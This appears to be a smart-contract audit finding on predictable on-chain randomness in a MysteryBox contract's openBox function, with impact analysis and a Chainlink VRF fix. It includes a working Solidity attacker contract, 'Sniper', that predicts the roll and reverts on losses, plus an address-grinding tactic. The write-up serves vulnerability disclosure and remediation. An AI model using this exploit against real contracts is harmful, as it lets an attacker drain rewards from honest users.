The openBox function in the MysteryBox contract derives its randomness on-chain by hashing block.timestamp together with msg.sender using keccak256 (note that msg.sender is a transaction property chosen by the caller, not a block property).
This approach is insecure because every input to the hash is either public or caller-controlled. block.timestamp is set by the block producer (who can shift it within the bounds the protocol tolerates) and is in any case the same for every transaction in the block, so it is known before openBox executes. msg.sender is picked by the caller: routing the call through a contract lets an attacker compute the identical keccak256 in the same transaction and revert unless the result is favourable, or grind over many addresses until one yields the desired outcome. Nothing in the scheme is unpredictable to the very party it is supposed to be unpredictable to, which undermines the fairness and integrity of the reward distribution.
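The following Solidity is an added illustration of that attack and is not code from the MysteryBox contest contract. It assumes a stand-in box whose roll is `keccak256(abi.encodePacked(block.timestamp, msg.sender)) % 100` with a hypothetical rare tier at 95 and above; the real derivation and tiers are not reproduced here. The attacker contract recomputes the roll with the same inputs inside the same transaction and only forwards the call when it wins, so a losing roll is never "spent".

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface IMysteryBox {
    function openBox() external;
}

/// Illustrative stand-in for the vulnerable pattern (assumed, not the audited code).
contract PredictableBox is IMysteryBox {
    mapping(address => uint256) public lastReward;

    function openBox() external override {
        // Both hash inputs are known to the caller before this executes.
        uint256 roll = uint256(
            keccak256(abi.encodePacked(block.timestamp, msg.sender))
        ) % 100;
        // Hypothetical tiers: 5% chance of the high-value reward.
        lastReward[msg.sender] = roll >= 95 ? 1 ether : 0;
    }
}

/// Attacker: predicts the outcome in the same transaction and reverts on a loss.
contract Sniper {
    IMysteryBox public immutable box;

    constructor(IMysteryBox _box) {
        box = _box;
    }

    /// The box will see msg.sender == address(this) and the same block.timestamp,
    /// so this is exactly the value the box is about to compute.
    function predictedRoll() public view returns (uint256) {
        return uint256(
            keccak256(abi.encodePacked(block.timestamp, address(this)))
        ) % 100;
    }

    /// Only open the box when the predicted roll lands in the rare tier.
    /// A revert costs gas but never consumes an unfavourable roll.
    function openIfRare() external {
        require(predictedRoll() >= 95, "unfavourable roll, retry next block");
        box.openBox();
    }
}
```

Because the caller also controls which address acts as msg.sender, the attacker can deploy several Sniper instances (or choose CREATE2 salts) so that for almost any block at least one address produces a winning roll, turning the 5% tier into a near-certainty.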
With a predictable source of randomness, an attacker can consistently obtain the high-value rewards or otherwise skew the reward distribution in their favour. Honest users are left with the low-value outcomes, which erodes trust in the contract and deters participation. If the high-value rewards are funded by the contract, the attacker can drain them, causing direct financial loss and compromising the contract's sustainability and reputation.
• Manual Review: Analyzing the smart contract code to identify vulnerabilities in the random number generation method.
Replace the on-chain derivation with Chainlink's Verifiable Random Function (VRF), which delivers randomness that the requester cannot predict or influence and that is verifiable on-chain. VRF is asynchronous: the randomness is requested in one transaction and delivered later by the coordinator in a callback. openBox should therefore only record the request, the outcome must be settled in fulfillRandomWords, the reward tiers must be fixed before the request is made, and the user must not be able to abandon a pending request once it has been issued, or the same "revert on a loss" strategy reappears.
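As an added example of that request/fulfil structure (not code from the contest contract, and the reward tier is again a hypothetical 5% band), the consumer below uses the Chainlink VRF v2 coordinator interface. The import paths assume the @chainlink/contracts package layout that places VRF under src/v0.8/vrf; adjust them to the version in use.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {VRFConsumerBaseV2} from "@chainlink/contracts/src/v0.8/vrf/VRFConsumerBaseV2.sol";
import {VRFCoordinatorV2Interface} from "@chainlink/contracts/src/v0.8/vrf/interfaces/VRFCoordinatorV2Interface.sol";

contract VrfMysteryBox is VRFConsumerBaseV2 {
    VRFCoordinatorV2Interface private immutable coordinator;
    bytes32 private immutable keyHash;
    uint64 private immutable subscriptionId;

    uint16 private constant REQUEST_CONFIRMATIONS = 3;
    uint32 private constant CALLBACK_GAS_LIMIT = 100_000;
    uint32 private constant NUM_WORDS = 1;

    // requestId => user who opened the box; pending request per user.
    mapping(uint256 => address) public requestToOpener;
    mapping(address => uint256) public pendingRequest;
    mapping(address => uint256) public reward;

    event BoxRequested(address indexed opener, uint256 requestId);
    event BoxOpened(address indexed opener, uint256 requestId, uint256 payout);

    constructor(address _coordinator, bytes32 _keyHash, uint64 _subscriptionId)
        VRFConsumerBaseV2(_coordinator)
    {
        coordinator = VRFCoordinatorV2Interface(_coordinator);
        keyHash = _keyHash;
        subscriptionId = _subscriptionId;
    }

    /// Step 1: the user commits to opening a box. No outcome is computable here,
    /// and the pending request cannot be cancelled or replaced.
    function openBox() external {
        require(pendingRequest[msg.sender] == 0, "request already pending");
        uint256 requestId = coordinator.requestRandomWords(
            keyHash,
            subscriptionId,
            REQUEST_CONFIRMATIONS,
            CALLBACK_GAS_LIMIT,
            NUM_WORDS
        );
        requestToOpener[requestId] = msg.sender;
        pendingRequest[msg.sender] = requestId;
        emit BoxRequested(msg.sender, requestId);
    }

    /// Step 2: the coordinator delivers verified randomness. VRFConsumerBaseV2's
    /// rawFulfillRandomWords ensures only the coordinator can reach this function.
    /// Keep it cheap and free of external calls: a reverting callback is not retried.
    function fulfillRandomWords(uint256 requestId, uint256[] memory randomWords)
        internal
        override
    {
        address opener = requestToOpener[requestId];
        require(opener != address(0), "unknown request");
        delete requestToOpener[requestId];
        delete pendingRequest[opener];

        uint256 roll = randomWords[0] % 100;
        // Hypothetical tiers, fixed before the request was made.
        uint256 payout = roll >= 95 ? 1 ether : 0;
        reward[opener] += payout;
        emit BoxOpened(opener, requestId, payout);
    }
}
```

Settling the reward inside the callback, rather than letting the user trigger a separate "claim" once the random word is public, is what closes the gap: by the time the outcome exists, the user has already committed and has no decision left to make.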